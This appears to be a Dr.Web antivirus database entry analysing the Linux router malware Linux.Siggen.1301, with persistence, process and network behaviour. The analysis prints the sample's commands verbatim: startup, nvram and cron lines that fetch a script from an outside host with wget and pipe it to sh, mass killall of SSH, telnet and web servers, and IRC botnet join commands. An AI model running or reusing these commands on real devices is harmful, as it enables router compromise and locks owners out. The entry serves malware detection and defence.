La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Linux.Siggen.1301

Aggiunto al database dei virus Dr.Web: 2018-12-19

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/init.d/rcS.bak
  • /etc/init.d/rcS
  • /etc/persistent/rc.poststart
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Modifies router settings:
  • /bin/nvram
  • /bin/cfgmtd
Stops system services:
  • service httpd stop
  • service telnetd stop
  • service sshd stop
Launches processes:
  • sh -c cat /etc/init.d/rcS | grep -v \"wget\" > /etc/init.d/rcS.bak
  • cat /etc/init.d/rcS
  • grep -v wget
  • sh -c echo \"sleep 300 && wget -qO - http://fkd.derpcity.ru/nvr | sh &\" > /etc/init.d/rcS
  • sh -c cat /etc/init.d/rcS.bak >> /etc/init.d/rcS
  • cat /etc/init.d/rcS.bak
  • sh -c rm -rf /etc/init.d/rcS.bak
  • rm -rf /etc/init.d/rcS.bak
  • sh -c nvram set rc_firewall=\"sleep 120 && wget -qO - http://fkd.derpcity.ru/nvr | sh\" > /dev/null 2>&1
  • sh -c nvram commit > /dev/null 2>&1
  • sh -c ( echo \"sleep 120 && wget -q -O - http://fkd.derpcity.ru/nvr | sh > /dev/null 2>&1 &\" > /etc/persistent/rc.poststart ) > /dev/null 2>&1
  • sh -c chmod 755 /etc/persistent/rc.poststart > /dev/null 2>&1
  • chmod 755 /etc/persistent/rc.poststart
  • sh -c cfgmtd -w -p /etc/ > /dev/null 2>&1
  • sh -c ( cfgmtd -w -p /etc/ && sleep 432000 && reboot & ) > /dev/null 2>&1
  • sh -c rm -rf /var/run/wgsh > /dev/null 2>&1 &
  • sleep 432000
  • sh -c rm -rf /var/run/bbsh > /dev/null 2>&1 &
  • rm -rf /var/run/wgsh
  • sh -c rm -rf /var/run/tty1 > /dev/null 2>&1 &
  • sh -c rm -rf /var/run/tty2 > /dev/null 2>&1 &
  • rm -rf /var/run/tty1
  • sh -c rm -rf /var/run/tty3 > /dev/null 2>&1 &
  • rm -rf /var/run/tty2
  • sh -c rm -rf /var/run/tty4 > /dev/null 2>&1 &
  • rm -rf /var/run/tty3
  • sh -c rm -rf /var/run/tty5 > /dev/null 2>&1 &
  • rm -rf /var/run/tty4
  • sh -c rm -rf /var/run/tty6 > /dev/null 2>&1 &
  • rm -rf /var/run/tty5
  • sh -c rm -rf /tmp/tty1 > /dev/null 2>&1 &
  • rm -rf /var/run/tty6
  • sh -c rm -rf /tmp/tty2 > /dev/null 2>&1 &
  • rm -rf /tmp/tty1
  • sh -c rm -rf /tmp/tty3 > /dev/null 2>&1 &
  • rm -rf /tmp/tty2
  • sh -c rm -rf /tmp/tty4 > /dev/null 2>&1 &
  • rm -rf /tmp/tty3
  • sh -c rm -rf /tmp/tty5 > /dev/null 2>&1 &
  • rm -rf /tmp/tty4
  • rm -rf /tmp/tty5
  • sh -c rm -rf /tmp/tty6 > /dev/null 2>&1 &
  • sh -c rm -rf /var/run/pty > /dev/null 2>&1 &
  • rm -rf /tmp/tty6
  • sh -c killall -9 arm > /dev/null 2>&1 &
  • rm -rf /var/run/pty
  • sh -c killall -9 mips > /dev/null 2>&1 &
  • sh -c killall -9 mipsel > /dev/null 2>&1 &
  • sh -c killall -9 powerpc > /dev/null 2>&1 &
  • sh -c killall -9 ppc > /dev/null 2>&1 &
  • sh -c killall -9 daemon.armv4l.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.i686.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.mips.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.mipsel.mod > /dev/null 2>&1 &
  • sh -c kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &
  • sh -c rm -rf /tmp/.xs/* > /dev/null 2>&1 &
  • cat /tmp/.xs/*.pid
  • rm -rf /tmp/.xs/*
  • sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
  • chmod 700 <SAMPLE_FULL_PATH>
  • sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1
  • grep -v no cron
  • crontab -l
  • grep -v <SAMPLE_FULL_PATH>
  • grep -v lesshts/run.sh
  • sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x001804289383
  • sh -c crontab /var/run/.x001804289383
  • crontab /var/run/.x001804289383
  • sh -c rm -rf /var/run/.x001804289383
  • rm -rf /var/run/.x001804289383
  • sh -c /bin/uname -n
  • sh -c nvram get router_name
  • /bin/uname -n
  • sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &
  • sh -c service httpd stop > /dev/null 2>&1 &
  • cat /var/run/httpd.pid
  • sh -c killall -9 mini_httpd > /dev/null 2>&1 &
  • sh -c killall -9 minihttpd > /dev/null 2>&1 &
  • sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &
  • cat /var/run/thttpd.pid
  • sh -c nvram set httpd_enable=0 > /dev/null 2>&1
  • sh -c nvram set http_enable=0 > /dev/null 2>&1
  • sh -c killall -9 httpd > /dev/null 2>&1 &
  • sh -c service telnetd stop > /dev/null 2>&1 &
  • sh -c service sshd stop > /dev/null 2>&1 &
  • sh -c killall -9 telnetd > /dev/null 2>&1 &
  • sh -c killall -9 utelnetd > /dev/null 2>&1 &
  • sh -c killall -9 dropbear > /dev/null 2>&1 &
  • sh -c killall -9 sshd > /dev/null 2>&1 &
  • sh -c killall -9 lighttpd > /dev/null 2>&1 &
Attempts to kill system processes:
  • killall -9 mini_httpd
  • killall -9 minihttpd
  • killall -9 httpd
  • killall -9 telnetd
  • killall -9 utelnetd
  • killall -9 dropbear
  • killall -9 sshd
Kills system processes:
  • sshd
Attempts to kill the following processes:
  • killall -9 arm
  • killall -9 mips
  • killall -9 mipsel
  • killall -9 powerpc
  • killall -9 ppc
  • killall -9 daemon.armv4l.mod
  • killall -9 daemon.i686.mod
  • killall -9 daemon.mips.mod
  • killall -9 daemon.mipsel.mod
  • killall -9 lighttpd
Performs operations with the file system:
Modifies file access rights:
  • <SAMPLE_FULL_PATH>
  • /var/spool/cron/crontabs/tmp.weLEAh
Creates or modifies files:
  • /var/run/.x001804289383
  • /run/.x001804289383
  • /var/spool/cron/crontabs/tmp.weLEAh
Deletes files:
  • /etc/init.d/rcS.bak
  • /var/run/wgsh
  • /var/run/bbsh
  • /var/run/tty1
  • /var/run/tty2
  • /var/run/tty3
  • /var/run/tty4
  • /var/run/tty5
  • /var/run/tty6
  • /tmp/tty1
  • /tmp/tty2
  • /tmp/tty3
  • /tmp/tty4
  • /tmp/tty5
  • /tmp/tty6
  • /var/run/pty
  • /tmp/.xs/*
  • /var/run/.x001804289383
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:63008
Connects to the following servers over the IRC protocol:
  • Server: 19#.#0.197.29; Command: NICK Ms|x|0|462864|unknown\nUSER x00 localhost localhost :2018f\n
  • Server: 19#.#0.197.29; Command: NICK Ms|x|0|462864|unknown\n
  • Server: 19#.#0.197.29; Command: MODE Ms|x|0|462864|unknown -xi\n
  • Server: 19#.#0.197.29; Command: JOIN #0x01 :777\n
Other:
Collects OS information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number